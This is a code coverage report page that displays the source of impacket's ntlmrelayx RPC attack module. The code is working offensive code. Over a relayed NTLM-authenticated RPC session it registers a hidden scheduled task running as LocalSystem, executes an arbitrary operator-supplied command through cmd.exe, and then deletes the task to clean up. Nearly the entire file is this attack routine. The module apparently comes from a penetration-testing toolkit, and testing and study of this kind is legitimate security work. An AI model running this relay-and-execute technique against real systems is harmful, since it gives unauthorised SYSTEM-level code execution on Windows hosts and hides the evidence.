Coverage for /root/GitHubProjects/impacket/impacket/examples/ntlmrelayx/attacks/rpcattack.py : 28%

Hot-keys on this page
r m x p toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
2#
3# This software is provided under under a slightly modified version
4# of the Apache Software License. See the accompanying LICENSE file
5# for more information.
6#
7# Authors:
8# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
9# Based on @agsolino and @_dirkjan code
10#
12import time
13import string
14import random
16from impacket import LOG
17from impacket.dcerpc.v5 import tsch
18from impacket.dcerpc.v5.dtypes import NULL
19from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
21PROTOCOL_ATTACK_CLASS = "RPCAttack"
23class TSCHRPCAttack:
24 def _xml_escape(self, data):
25 replace_table = {
26 "&": "&",
27 '"': """,
28 "'": "'",
29 ">": ">",
30 "<": "<",
31 }
32 return ''.join(replace_table.get(c, c) for c in data)
34 def _run(self):
35 # Here PUT YOUR CODE!
36 tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
38 cmd = "cmd.exe"
39 args = "/C %s" % self.config.command
41 LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))
43 xml = """<?xml version="1.0" encoding="UTF-16"?>
44<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
45 <Triggers>
46 <CalendarTrigger>
47 <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
48 <Enabled>true</Enabled>
49 <ScheduleByDay>
50 <DaysInterval>1</DaysInterval>
51 </ScheduleByDay>
52 </CalendarTrigger>
53 </Triggers>
54 <Principals>
55 <Principal id="LocalSystem">
56 <UserId>S-1-5-18</UserId>
57 <RunLevel>HighestAvailable</RunLevel>
58 </Principal>
59 </Principals>
60 <Settings>
61 <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
62 <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
63 <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
64 <AllowHardTerminate>true</AllowHardTerminate>
65 <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
66 <IdleSettings>
67 <StopOnIdleEnd>true</StopOnIdleEnd>
68 <RestartOnIdle>false</RestartOnIdle>
69 </IdleSettings>
70 <AllowStartOnDemand>true</AllowStartOnDemand>
71 <Enabled>true</Enabled>
72 <Hidden>true</Hidden>
73 <RunOnlyIfIdle>false</RunOnlyIfIdle>
74 <WakeToRun>false</WakeToRun>
75 <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
76 <Priority>7</Priority>
77 </Settings>
78 <Actions Context="LocalSystem">
79 <Exec>
80 <Command>%s</Command>
81 <Arguments>%s</Arguments>
82 </Exec>
83 </Actions>
84</Task>
85 """ % (self._xml_escape(cmd), self._xml_escape(args))
87 LOG.info('Creating task \\%s' % tmpName)
88 tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
90 LOG.info('Running task \\%s' % tmpName)
91 done = False
93 tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)
95 while not done:
96 LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
97 resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
98 if resp['pLastRuntime']['wYear'] != 0:
99 done = True
100 else:
101 time.sleep(2)
103 LOG.info('Deleting task \\%s' % tmpName)
104 tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
105 LOG.info('Completed!')
108class RPCAttack(ProtocolAttack, TSCHRPCAttack):
109 PLUGIN_NAMES = ["RPC"]
111 def __init__(self, config, dce, username):
112 ProtocolAttack.__init__(self, config, dce, username)
113 self.dce = dce
114 self.rpctransport = dce.get_rpc_transport()
115 self.stringbinding = self.rpctransport.get_stringbinding()
117 def run(self):
118 # Here PUT YOUR CODE!
120 # Assume the endpoint is TSCH
121 # TODO: support relaying RPC to different endpoints
122 # TODO: support for providing a shell
123 # TODO: support for getting an output
124 if self.config.command is not None:
125 TSCHRPCAttack._run(self)
126 else:
127 LOG.error("No command provided to attack")